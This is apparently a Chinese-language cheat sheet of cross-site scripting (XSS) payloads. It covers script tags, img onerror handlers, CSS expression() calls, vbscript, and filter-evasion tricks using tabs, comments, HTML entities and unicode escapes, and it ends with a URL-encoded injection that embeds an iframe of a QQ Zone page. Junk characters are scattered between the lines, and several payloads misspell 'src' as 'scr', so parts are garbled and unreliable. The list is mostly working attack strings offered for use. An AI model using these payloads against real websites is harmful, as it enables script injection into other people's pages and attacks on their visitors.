<script>alert("跨站")</script> (最常用)
" O* }; P3 Q3 q5 f* l<img scr=javascript:alert("跨站")></img>/ q7 |! b2 O) I5 H7 K% S& K
<img scr="javascript: alert(/跨站/)></img>
; z9 P/ P& |1 V" X2 L<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)& I& U! H& \6 v% e/ c' j2 ], ^; s
<img scr="#" onerror=alert(/跨站/)></img>! B2 `% \/ Q; r1 Y" R
<img scr="#" style="xss:expression(alert(/xss/));"></img>0 t1 _4 d; L! Q' m* h
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
/ B' q) B7 c8 b0 s<img src=vbscript:msgbox ("xss")></img>
+ w* I, b5 w& ^<style> input {left:expression (alert('xss'))}</style>
& P& v' M5 c- v0 C+ w/ Y& ^<div style={left:expression (alert('xss'))}></div>. W% } N+ Y6 n7 j
<div style={left:exp/* */ression (alert('xss'))}></div>0 v4 \. F4 b% B+ y- z) u
<div style={left:\0065\0078ression (alert('xss'))}></div>' ]6 q" K' P) V
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>* R, a) X& u# h3 s, u! S
unicode <div style="{left:expRessioN (alert('xss'))}">) ?. W6 I+ |& \- T
- W5 U) f Y. u2 }, e6 `
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
9 b! |6 m& K* f' b$ t9 `2 c |